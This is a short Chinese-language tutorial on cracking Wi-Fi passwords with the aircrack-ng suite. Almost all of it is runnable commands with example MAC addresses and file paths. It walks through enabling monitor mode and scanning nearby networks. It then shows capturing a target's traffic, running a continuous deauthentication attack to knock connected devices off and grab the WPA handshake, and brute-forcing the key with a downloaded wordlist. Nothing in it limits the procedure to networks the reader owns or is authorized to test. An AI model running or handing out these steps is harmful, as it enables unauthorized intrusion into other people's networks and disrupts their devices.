wifi密碼破解
步驟1:查看網卡信息
ifconfig
找到你要用到的網卡
步驟2:啟動網卡監聽模式
airmon-ng start wlan0
我的是wlp2s0
步驟三:查看網卡變化
wlan0mon
我的是wlp2s0mon
后面多了mon證明成功
步驟四:掃描附近wifi
airodump-ng wlan0mon
我的是airodump-ng wlp2s0mon
記錄下bssid ch 和bssid對應的station
步驟五:抓包
要在一個可以寫入的文件下下打開終端
airodump-ng -w 包名 -c ch --bssid bssid 使用的網卡名稱mon
例如
airodump-ng -w 403 -c 11 --bssid CE:2F:71:23:CC:74 wlp2s0mon
為了方便抓包我們攻擊這個wifi使連接的設備斷開重連從而方便我們抓包(重開一個終端執行攻擊而不是結束抓包從而攻擊)
sudo aireplay-ng -0 0 -a bssid -c station 使用的網卡的名稱mon
例如
sudo aireplay-ng -0 0 -a 76:E5:F9:D8:4A:73 -c AC:92:32:61:DC:65 wlp2s0mon
直到
抓包的終端出現[ WPA handshake: CE:2F:71:23:CC:74
結束攻擊結束抓包
步驟六:跑字典
sudo aircrack-ng -w 字典的路徑 抓到包的路徑
例如
sudo aircrack-ng -w /home/chen/下載/wpa-dictionary-master/other-1.txt /home/chen/下 載/403-01.cap
字典在github上有
https://github.com/conwnet/wpa-dictionary